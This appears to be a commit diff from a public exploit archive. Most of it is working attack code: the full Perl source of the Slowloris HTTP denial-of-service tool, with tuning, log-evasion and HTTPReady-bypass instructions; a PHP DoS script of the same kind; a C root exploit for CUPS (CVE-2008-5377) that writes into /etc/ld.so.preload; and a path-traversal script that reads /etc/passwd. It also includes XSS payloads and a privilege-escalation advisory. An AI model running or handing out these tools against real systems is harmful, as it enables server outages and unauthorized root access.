Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4
# milw0rm.com [2009-06-17]
#!/usr/bin/perl -w
use strict;
use IO::Socket::INET;
use IO::Socket::SSL;
use Getopt::Long;
use Config;
$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errors
print <<EOTEXT;
CCCCCCCCCCOOCCOOOOO888\@8\@8888OOOOCCOOO888888888\@\@\@\@\@\@\@\@\@8\@8\@\@\@\@888OOCooocccc::::
CCCCCCCCCCCCCCCOO888\@888888OOOCCCOOOO888888888888\@88888\@\@\@\@\@\@\@888\@8OOCCoococc:::
CCCCCCCCCCCCCCOO88\@\@888888OOOOOOOOOO8888888O88888888O8O8OOO8888\@88\@\@8OOCOOOCoc::
CCCCooooooCCCO88\@\@8\@88\@888OOOOOOO88888888888OOOOOOOOOOCCCCCOOOO888\@8888OOOCc::::
CooCoCoooCCCO8\@88\@8888888OOO888888888888888888OOOOCCCooooooooCCOOO8888888Cocooc:
ooooooCoCCC88\@88888\@888OO8888888888888888O8O8888OOCCCooooccccccCOOOO88\@888OCoccc
ooooCCOO8O888888888\@88O8OO88888OO888O8888OOOO88888OCocoococ::ccooCOO8O888888Cooo
oCCCCCCO8OOOCCCOO88\@88OOOOOO8888O888OOOOOCOO88888O8OOOCooCocc:::coCOOO888888OOCC
oCCCCCOOO88OCooCO88\@8OOOOOO88O888888OOCCCCoCOOO8888OOOOOOOCoc::::coCOOOO888O88OC
oCCCCOO88OOCCCCOO8\@\@8OOCOOOOO8888888OoocccccoCO8O8OO88OOOOOCc.:ccooCCOOOO88888OO
CCCOOOO88OOCCOOO8\@888OOCCoooCOO8888Ooc::...::coOO88888O888OOo:cocooCCCCOOOOOO88O
CCCOO88888OOCOO8\@\@888OCcc:::cCOO888Oc..... ....cCOOOOOOOOOOOc.:cooooCCCOOOOOOOOO
OOOOOO88888OOOO8\@8\@8Ooc:.:...cOO8O88c. . .coOOO888OOOOCoooooccoCOOOOOCOOOO
OOOOO888\@8\@88888888Oo:. . ...cO888Oc.. :oOOOOOOOOOCCoocooCoCoCOOOOOOOO
COOO888\@88888888888Oo:. .O8888C: .oCOo. ...cCCCOOOoooooocccooooooooCCCOO
CCCCOO888888O888888Oo. .o8Oo. .cO88Oo: :. .:..ccoCCCooCooccooccccoooooCCCC
coooCCO8\@88OO8O888Oo:::... .. :cO8Oc. . ..... :. .:ccCoooooccoooocccccooooCCC
:ccooooCO888OOOO8OOc..:...::. .co8\@8Coc::.. .... ..:cooCooooccccc::::ccooCCooC
.:::coocccoO8OOOOOOC:..::....coCO8\@8OOCCOc:... ....:ccoooocccc:::::::::cooooooC
....::::ccccoCCOOOOOCc......:oCO8\@8\@88OCCCoccccc::c::.:oCcc:::cccc:..::::coooooo
.......::::::::cCCCCCCoocc:cO888\@8888OOOOCOOOCoocc::.:cocc::cc:::...:::coocccccc
...........:::..:coCCCCCCCO88OOOO8OOOCCooCCCooccc::::ccc::::::.......:ccocccc:co
.............::....:oCCoooooCOOCCOCCCoccococc:::::coc::::....... ...:::cccc:cooo
..... ............. .coocoooCCoco:::ccccccc:::ccc::.......... ....:::cc::::coC
. . ... .... .. .:cccoCooc:.. ::cccc:::c:.. ......... ......::::c:cccco
. .. ... .. .. .. ..:...:cooc::cccccc:..... ......... .....:::::ccoocc
. . .. ..::cccc:.::ccoocc:. ........... .. . ..:::.:::::::ccco
Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client
EOTEXT
my ( $host, $port, $sendhost, $shost, $test, $version, $timeout, $connections );
my ( $cache, $httpready, $method, $ssl, $rand, $tcpto );
my $result = GetOptions(
'shost=s' => \$shost,
'dns=s' => \$host,
'httpready' => \$httpready,
'num=i' => \$connections,
'cache' => \$cache,
'port=i' => \$port,
'https' => \$ssl,
'tcpto=i' => \$tcpto,
'test' => \$test,
'timeout=i' => \$timeout,
'version' => \$version,
);
if ($version) {
print "Version 0.7\n";
exit;
}
unless ($host) {
print "Usage:\n\n\tperl $0 -dns [www.example.com] -options\n";
print "\n\tType 'perldoc $0' for help with options.\n\n";
exit;
}
unless ($port) {
$port = 80;
print "Defaulting to port 80.\n";
}
unless ($tcpto) {
$tcpto = 5;
print "Defaulting to a 5 second tcp connection timeout.\n";
}
unless ($test) {
unless ($timeout) {
$timeout = 100;
print "Defaulting to a 100 second re-try timeout.\n";
}
unless ($connections) {
$connections = 1000;
print "Defaulting to 1000 connections.\n";
}
}
my $usemultithreading = 0;
if ( $Config{usethreads} ) {
print "Multithreading enabled.\n";
$usemultithreading = 1;
use threads;
use threads::shared;
}
else {
print "No multithreading capabilites found!\n";
print "Slowloris will be slower than normal as a result.\n";
}
my $packetcount : shared = 0;
my $failed : shared = 0;
my $connectioncount : shared = 0;
srand() if ($cache);
if ($shost) {
$sendhost = $shost;
}
else {
$sendhost = $host;
}
if ($httpready) {
$method = "POST";
}
else {
$method = "GET";
}
if ($test) {
my @times = ( "2", "30", "90", "240", "500" );
my $totaltime = 0;
foreach (@times) {
$totaltime = $totaltime + $_;
}
$totaltime = $totaltime / 60;
print "This test could take up to $totaltime minutes.\n";
my $delay = 0;
my $working = 0;
my $sock;
if ($ssl) {
if (
$sock = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
else {
if (
$sock = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working = 1;
}
}
if ($working) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"GET /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
if ( print $sock $primarypayload ) {
print "Connection successful, now comes the waiting game...\n";
}
else {
print
"That's odd - I connected but couldn't send the data to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
}
else {
print "Uhm... I can't connect to $host:$port.\n";
print "Is something wrong?\nDying.\n";
exit;
}
for ( my $i = 0 ; $i <= $#times ; $i++ ) {
print "Trying a $times[$i] second delay: \n";
sleep( $times[$i] );
if ( print $sock "X-a: b\r\n" ) {
print "\tWorked.\n";
$delay = $times[$i];
}
else {
if ( $SIG{__WARN__} ) {
$delay = $times[ $i - 1 ];
last;
}
print "\tFailed after $times[$i] seconds.\n";
}
}
if ( print $sock "Connection: Close\r\n\r\n" ) {
print "Okay that's enough time. Slowloris closed the socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
else {
print "Remote server closed socket.\n";
print "Use $delay seconds for -timeout.\n";
exit;
}
if ( $delay < 166 ) {
print <<EOSUCKS2BU;
Since the timeout ended up being so small ($delay seconds) and it generally
takes between 200-500 threads for most servers and assuming any latency at
all... you might have trouble using Slowloris against this target. You can
tweak the -tcpto flag down to 1 second but it still may not build the sockets
in time.
EOSUCKS2BU
}
}
else {
print
"Connecting to $host:$port every $timeout seconds with $connections sockets:\n";
if ($usemultithreading) {
domultithreading($connections);
}
else {
doconnections( $connections, $usemultithreading );
}
}
sub doconnections {
my ( $num, $usemultithreading ) = @_;
my ( @first, @sock, @working );
my $failedconnections = 0;
$working[$_] = 0 foreach ( 1 .. $num ); #initializing
$first[$_] = 0 foreach ( 1 .. $num ); #initializing
while (1) {
$failedconnections = 0;
print "\t\tBuilding sockets.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 0 ) {
if ($ssl) {
if (
$sock[$z] = new IO::Socket::SSL(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
}
else {
$working[$z] = 0;
}
}
else {
if (
$sock[$z] = new IO::Socket::INET(
PeerAddr => "$host",
PeerPort => "$port",
Timeout => "$tcpto",
Proto => "tcp",
)
)
{
$working[$z] = 1;
$packetcount = $packetcount + 3; #SYN, SYN+ACK, ACK
}
else {
$working[$z] = 0;
}
}
if ( $working[$z] == 1 ) {
if ($cache) {
$rand = "?" . int( rand(99999999999999) );
}
else {
$rand = "";
}
my $primarypayload =
"$method /$rand HTTP/1.1\r\n"
. "Host: $sendhost\r\n"
. "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.503l3; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; MSOffice 12)\r\n"
. "Content-Length: 42\r\n";
my $handle = $sock[$z];
if ($handle) {
print $handle "$primarypayload";
if ( $SIG{__WARN__} ) {
$working[$z] = 0;
close $handle;
$failed++;
$failedconnections++;
}
else {
$packetcount++;
$working[$z] = 1;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
$failed++;
$failedconnections++;
}
}
}
print "\t\tSending data.\n";
foreach my $z ( 1 .. $num ) {
if ( $working[$z] == 1 ) {
if ( $sock[$z] ) {
my $handle = $sock[$z];
if ( print $handle "X-a: b\r\n" ) {
$working[$z] = 1;
$packetcount++;
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
else {
$working[$z] = 0;
#debugging info
$failed++;
$failedconnections++;
}
}
}
print
"Current stats:\tSlowloris has now sent $packetcount packets successfully.\nThis thread now sleeping for $timeout seconds...\n\n";
sleep($timeout);
}
}
sub domultithreading {
my ($num) = @_;
my @thrs;
my $i = 0;
my $connectionsperthread = 50;
while ( $i < $num ) {
$thrs[$i] =
threads->create( \&doconnections, $connectionsperthread, 1 );
$i += $connectionsperthread;
}
my @threadslist = threads->list();
while ( $#threadslist > 0 ) {
$failed = 0;
}
}
__END__
=head1 TITLE
Slowloris
=head1 VERSION
Version 0.7 Beta
=head1 DATE
06/17/2009
=head1 AUTHOR
RSnake <h@ckers.org> with threading from John Kinsella
=head1 ABSTRACT
Slowloris both helps identify the timeout windows of a HTTP server or Proxy server, can bypass httpready protection and ultimately performs a fairly low bandwidth denial of service. It has the added benefit of allowing the server to come back at any time (once the program is killed), and not spamming the logs excessively. It also keeps the load nice and low on the target server, so other vital processes don't die unexpectedly, or cause alarm to anyone who is logged into the server for other reasons.
=head1 AFFECTS
Apache 1.x, Apache 2.x, dhttpd, GoAhead WebServer, Squid, others...?
=head1 NOT AFFECTED
IIS6.0, IIS7.0, lighthttpd, others...?
=head1 DESCRIPTION
Slowloris is designed so that a single machine (probably a Linux/UNIX machine since Windows appears to limit how many sockets you can have open at any given time) can easily tie up a typical web server or proxy server by locking up all of it's threads as they patiently wait for more data. Some servers may have a smaller tolerance for timeouts than others, but Slowloris can compensate for that by customizing the timeouts. There is an added function to help you get started with finding the right sized timeouts as well.
As a side note, Slowloris does not consume a lot of resources so modern operating systems don't have a need to start shutting down sockets when they come under attack, which actually in turn makes Slowloris better than a typical flooder in certain circumstances. Think of Slowloris as the HTTP equivalent of a SYN flood.
=head2 Testing
If the timeouts are completely unknown, Slowloris comes with a mode to help you get started in your testing:
=head3 Testing Example:
./slowloris.pl -dns www.example.com -port 80 -test
This won't give you a perfect number, but it should give you a pretty good guess as to where to shoot for. If you really must know the exact number, you may want to mess with the @times array (although I wouldn't suggest that unless you know what you're doing).
=head2 HTTP DoS
Once you find a timeout window, you can tune Slowloris to use certain timeout windows. For instance, if you know that the server has a timeout of 3000 seconds, but the the connection is fairly latent you may want to make the timeout window 2000 seconds and increase the TCP timeout to 5 seconds. The following example uses 500 sockets. Most average Apache servers, for instance, tend to fall down between 400-600 sockets with a default configuration. Some are less than 300. The smaller the timeout the faster you will consume all the available resources as other sockets that are in use become available - this would be solved by threading, but that's for a future revision. The closer you can get to the exact number of sockets, the better, because that will reduce the amount of tries (and associated bandwidth) that Slowloris will make to be successful. Slowloris has no way to identify if it's successful or not though.
=head3 HTTP DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5
=head2 HTTPReady Bypass
HTTPReady only follows certain rules so with a switch Slowloris can bypass HTTPReady by sending the attack as a POST verses a GET or HEAD request with the -httpready switch.
=head3 HTTPReady Bypass Example
./slowloris.pl -dns www.example.com -port 80 -timeout 2000 -num 500 -tcpto 5 -httpready
=head2 Stealth Host DoS
If you know the server has multiple webservers running on it in virtual hosts, you can send the attack to a seperate virtual host using the -shost variable. This way the logs that are created will go to a different virtual host log file, but only if they are kept separately.
=head3 Stealth Host DoS Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -tcpto 1 -shost www.virtualhost.com
=head2 HTTPS DoS
Slowloris does support SSL/TLS on an experimental basis with the -https switch. The usefulness of this particular option has not been thoroughly tested, and in fact has not proved to be particularly effective in the very few tests I performed during the early phases of development. Your mileage may vary.
=head3 HTTPS DoS Example:
./slowloris.pl -dns www.example.com -port 443 -timeout 30 -num 500 -https
=head2 HTTP Cache
Slowloris does support cache avoidance on an experimental basis with the -cache switch. Some caching servers may look at the request path part of the header, but by sending different requests each time you can abuse more resources. The usefulness of this particular option has not been thoroughly tested. Your mileage may vary.
=head3 HTTP Cache Example:
./slowloris.pl -dns www.example.com -port 80 -timeout 30 -num 500 -cache
=head1 Issues
Slowloris is known to not work on several servers found in the NOT AFFECTED section above and through Netscalar devices, in it's current incarnation. They may be ways around this, but not in this version at this time. Most likely most anti-DDoS and load balancers won't be thwarted by Slowloris, unless Slowloris is extremely distrubted, although only Netscalar has been tested.
Slowloris isn't completely quiet either, because it can't be. Firstly, it does send out quite a few packets (although far far less than a typical GET request flooder). So it's not invisible if the traffic to the site is typically fairly low. On higher traffic sites it will unlikely that it is noticed in the log files - although you may have trouble taking down a larger site with just one machine, depending on their architecture.
For some reason Slowloris works way better if run from a *Nix box than from Windows. I would guess that it's probably to do with the fact that Windows limits the amount of open sockets you can have at once to a fairly small number. If you find that you can't open any more ports than ~130 or so on any server you test - you're probably running into this "feature" of modern operating systems. Either way, this program seems to work best if run from FreeBSD.
Once you stop the DoS all the sockets will naturally close with a flurry of RST and FIN packets, at which time the web server or proxy server will write to it's logs with a lot of 400 (Bad Request) errors. So while the sockets remain open, you won't be in the logs, but once the sockets close you'll have quite a few entries all lined up next to one another. You will probably be easy to find if anyone is looking at their logs at that point - although the DoS will be over by that point too.
=head1 What is a slow loris?
What exactly is a slow loris? It's an extremely cute but endangered mammal that happens to also be poisonous. Check this out:
http://www.youtube.com/watch?v=rLdQ3UhLoD4
# milw0rm.com [2009-06-17]

188
platforms/multiple/dos/8991.php
View file

@ -1,94 +1,94 @@
<?php
/*
DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601
I wrote it in PHP because I find it funny to make PHP attack apache...
I set it at 200 processes and it kill my test servers pretty quick. have fun kiddiez...
greetz: m1m1, t4dp0le, p00kiep0x, global hell [gH], b4b0, ri0t, JxT, bastard labs, neonfreon and everyone else you know who you are.....
--evilrabbi b4b0
*/
/**
* Usage function...
*
* @param $argv array
* @return void
*/
function usage($argv)
{
print "Usage: php ./{$argv[0]} <number of processes> <webserver ip or hostname>\n";
die();
}
/**
* Hangs the connection to the webserver
*
* @param $server string
* @return void
*/
function killTheFucker($server)
{
$request = "GET / HTTP/1.1\r\n";
$request .= "Host: {$server}\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Content-Length: " . rand(1, 1000) . "\r\n";
$request .= "X-a: " . rand(1, 10000) . "\r\n";
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE)
{
sleep(15);
}
}
/**
* main function
* @param $argc int
* @param $argv array
* @return void
*/
function main($argc, $argv)
{
$status = 1;
if ($argc < 3)
{
usage($argv);
}
$pids = Array();
for ($i = 0; $i < $argv[1]; $i++)
{
$pid = pcntl_fork();
if ($pid == -1)
{
die("ERROR!@# YOU MADE BABY JESUS CRY");
}
else if ($pid == 0)
{
killTheFucker($argv[2]);
exit(0);
}
else
{
$pids[] = $pid;
}
}
foreach ($pids as $pid)
{
pcntl_waitpid($pid, $status);
}
}
// fire everything up
main($argc, $argv);
# milw0rm.com [2009-06-22]
<?php
/*
DOS for the vulnerbility at http://isc.sans.org/diary.html?storyid=6601
I wrote it in PHP because I find it funny to make PHP attack apache...
I set it at 200 processes and it kill my test servers pretty quick. have fun kiddiez...
greetz: m1m1, t4dp0le, p00kiep0x, global hell [gH], b4b0, ri0t, JxT, bastard labs, neonfreon and everyone else you know who you are.....
--evilrabbi b4b0
*/
/**
* Usage function...
*
* @param $argv array
* @return void
*/
function usage($argv)
{
print "Usage: php ./{$argv[0]} <number of processes> <webserver ip or hostname>\n";
die();
}
/**
* Hangs the connection to the webserver
*
* @param $server string
* @return void
*/
function killTheFucker($server)
{
$request = "GET / HTTP/1.1\r\n";
$request .= "Host: {$server}\r\n";
$request .= "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)\r\n";
$request .= "Content-Length: " . rand(1, 1000) . "\r\n";
$request .= "X-a: " . rand(1, 10000) . "\r\n";
$sockfd = @fsockopen($server, 80, $errno, $errstr);
@fwrite($sockfd, $request);
while((fwrite($sockfd, "X-c:" . rand(1, 10000) . "\r\n")) !== FALSE)
{
sleep(15);
}
}
/**
* main function
* @param $argc int
* @param $argv array
* @return void
*/
function main($argc, $argv)
{
$status = 1;
if ($argc < 3)
{
usage($argv);
}
$pids = Array();
for ($i = 0; $i < $argv[1]; $i++)
{
$pid = pcntl_fork();
if ($pid == -1)
{
die("ERROR!@# YOU MADE BABY JESUS CRY");
}
else if ($pid == 0)
{
killTheFucker($argv[2]);
exit(0);
}
else
{
$pids[] = $pid;
}
}
foreach ($pids as $pid)
{
pcntl_waitpid($pid, $status);
}
}
// fire everything up
main($argc, $argv);
# milw0rm.com [2009-06-22]

204
platforms/multiple/local/7550.c
View file

@ -1,102 +1,102 @@
/*
* cve-2008-5377.c
*
* CUPS < 1.3.8-4 pstopdf filter exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Usage:
*
* $ gcc cve-2008-5377.c -o cve-2008-5377.c
* $ ./cve-2008-5377
* $ id
* uid=0(root) gid=1000(vm) ...
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
*
* pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
* a symlink attack on the /tmp/pstopdf.log temporary file.
*
* Operation:
*
* The exploit creates and prints a malformed postscript document that will
* cause the CUPS pstopdf filter to write an error message out to its log
* file that contains the string /tmp/getuid.so. However, since we also
* symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
* error message and malicious shared library path will be appended to the
* ld.so.preload file, allowing us to elevate privileges to root.
*
* Note:
*
* This exploit only works under the (rare) conditions that cupsd executes
* external filters as a privileged user, a printer on the system uses the
* pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
* must be world readable.
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
int
main(void)
{
int ret;
FILE *fp;
struct stat log;
fp = fopen("/tmp/cve-2008-5377.ps", "w");
if(!fp) {
printf("error: cannot open /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
fclose(fp);
fp = fopen("/tmp/getuid.c", "w");
if(!fp) {
printf("error: cannot open /tmp/getuid.c\n");
goto cleanup;
}
fprintf(fp, "int getuid(){return 0;}\n");
fclose(fp);
ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
if (WEXITSTATUS(ret) != 0) {
printf("error: cannot compile /tmp/getuid.c\n");
goto cleanup;
}
unlink("/tmp/pstopdf.log");
ret = stat("/tmp/pstopdf.log", &log);
if (ret != -1) {
printf("error: /tmp/pstopdf.log already exists\n");
goto cleanup;
}
ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
if (ret == -1) {
printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
goto cleanup;
}
ret = system("lp < /tmp/cve-2008-5377.ps");
if (WEXITSTATUS(ret) != 0) {
printf("error: could not print /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
cleanup:
unlink("/tmp/cve-2008-5377.ps");
unlink("/tmp/getuid.c");
return 0;
}
// milw0rm.com [2008-12-22]
/*
* cve-2008-5377.c
*
* CUPS < 1.3.8-4 pstopdf filter exploit
* Jon Oberheide <jon@oberheide.org>
* http://jon.oberheide.org
*
* Usage:
*
* $ gcc cve-2008-5377.c -o cve-2008-5377.c
* $ ./cve-2008-5377
* $ id
* uid=0(root) gid=1000(vm) ...
*
* Information:
*
* http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5377
*
* pstopdf in CUPS 1.3.8 allows local users to overwrite arbitrary files via
* a symlink attack on the /tmp/pstopdf.log temporary file.
*
* Operation:
*
* The exploit creates and prints a malformed postscript document that will
* cause the CUPS pstopdf filter to write an error message out to its log
* file that contains the string /tmp/getuid.so. However, since we also
* symlink the pstopdf log file /tmp/pstopdf.log to /etc/ld.so.preload, the
* error message and malicious shared library path will be appended to the
* ld.so.preload file, allowing us to elevate privileges to root.
*
* Note:
*
* This exploit only works under the (rare) conditions that cupsd executes
* external filters as a privileged user, a printer on the system uses the
* pstopdf filter (e.g. the pdf.ppd PDF converter). Also, /etc/ld.so.preload
* must be world readable.
*/
#include <stdio.h>
#include <stdlib.h>
#include <strings.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/wait.h>
int
main(void)
{
int ret;
FILE *fp;
struct stat log;
fp = fopen("/tmp/cve-2008-5377.ps", "w");
if(!fp) {
printf("error: cannot open /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
fprintf(fp, "%%!PS-Adobe-2.0 EPSF-2.0\n( /tmp/getuid.so ) CVE-2008-5377\n");
fclose(fp);
fp = fopen("/tmp/getuid.c", "w");
if(!fp) {
printf("error: cannot open /tmp/getuid.c\n");
goto cleanup;
}
fprintf(fp, "int getuid(){return 0;}\n");
fclose(fp);
ret = system("cc -shared /tmp/getuid.c -o /tmp/getuid.so");
if (WEXITSTATUS(ret) != 0) {
printf("error: cannot compile /tmp/getuid.c\n");
goto cleanup;
}
unlink("/tmp/pstopdf.log");
ret = stat("/tmp/pstopdf.log", &log);
if (ret != -1) {
printf("error: /tmp/pstopdf.log already exists\n");
goto cleanup;
}
ret = symlink("/etc/ld.so.preload", "/tmp/pstopdf.log");
if (ret == -1) {
printf("error: cannot symlink /tmp/pstopdf.log to /etc/ld.so.preload\n");
goto cleanup;
}
ret = system("lp < /tmp/cve-2008-5377.ps");
if (WEXITSTATUS(ret) != 0) {
printf("error: could not print /tmp/cve-2008-5377.ps\n");
goto cleanup;
}
cleanup:
unlink("/tmp/cve-2008-5377.ps");
unlink("/tmp/getuid.c");
return 0;
}
// milw0rm.com [2008-12-22]

15
platforms/multiple/remote/33405.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/37338/info
The APC Network Management Card is prone to multiple cross-site request-forgery and cross-site scripting vulnerabilities.
An attacker can exploit the cross-site request forgery issues to alter the settings on affected devices, which may lead to further network-based attacks.
The attacker can exploit the cross-site scripting issues to execute arbitrary script code in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials. Other attacks are also possible.
Versions prior to the following are vulnerable:
Network Management Card Firmware 3.7.2
Network Management Card Firmware 5.1.1
http://www.example.com/Forms/login1?login_username=<ScRiPt>alert(&#039;hello&#039;);</ScRiPt>

17
platforms/multiple/webapps/14006.txt
View file

@ -1,17 +0,0 @@
Advisory Name: Local Privilege Escalation in InterScan Web Security Virtual
Apliance 5.0
Internal Cybsec Advisory Id: 2010-0604
Vulnerability Class: Local Privilege Escalation
Release Date: 22-06-2010
Affected Applications: InterScan Web Security Virtual Aplliance 5.0. Other versions may be affected
Affected Platforms: Red Hat nash 5.1
Local / Remote: Local
Severity: Medium - CVSS: 6.8 (AV:L/AC:L/Au:S/C:C/I:C/A:C)
Researcher: Ivan Huertas
Vendor Status: Patched
Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerability_policy.pdf
Vulnerability Description:
InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root.
http://www.exploit-db.com/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf

46
platforms/multiple/webapps/9827.py
View file

@ -1,46 +0,0 @@
#!/usr/bin/env python
#
# html2ps <= 1.0 beta5 arbitrary file disclosure
# http://user.it.uu.se/~jan/html2ps.html
# author: epiphant <epiphant.0@gmail.com>
#
# the "include file" ssi directive doesn't check for directory
# traversal so you can include and disclose any file in the
# dir tree (very handy when html2ps is running as a part of a
# web app with data that you control)
# the vuln requires that "ssi" in the @html2ps block in the
# html2psrc file is set to 1, which is the default
#
# bonus info: some of the backtick operators look shady too
# but will require lots of prerequisites so they're uncool
#
# shouts: thcx labs, zybadawg333, fabiodds, str0ke
# jan k: shame on you - your perl is very ugly
#
import os
d = """\
<html>
<head>
<title>epiphant</title>
</head>
<body>
<h1>epiphant</h1>
<!--#include file="../../../../../../../etc/passwd"-->
<p>epiphant</p>
</body>
</html>
"""
try:
fi = open("epiphant.html", "w")
fi.write(d)
fi.close()
except:
print "can't write here"
exit(1)
os.system("html2ps epiphant.html > epiphant.ps")
os.system("gv epiphant.ps")
exit(0)

20
platforms/php/remote/33414.php Executable file
View file

@ -0,0 +1,20 @@
source: http://www.securityfocus.com/bid/37389/info
PHP is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
NOTE: In some configurations, attackers may exploit this issue to carry out HTML-injection attacks.
Versions prior to PHP 5.2.12 are vulnerable.
// overlong UTF-8 sequence
echo htmlspecialchars("A\xC0\xAF&", ENT_QUOTES, 'UTF-8');
// invalid Shift_JIS sequence
echo htmlspecialchars("B\x80&", ENT_QUOTES, 'Shift_JIS');
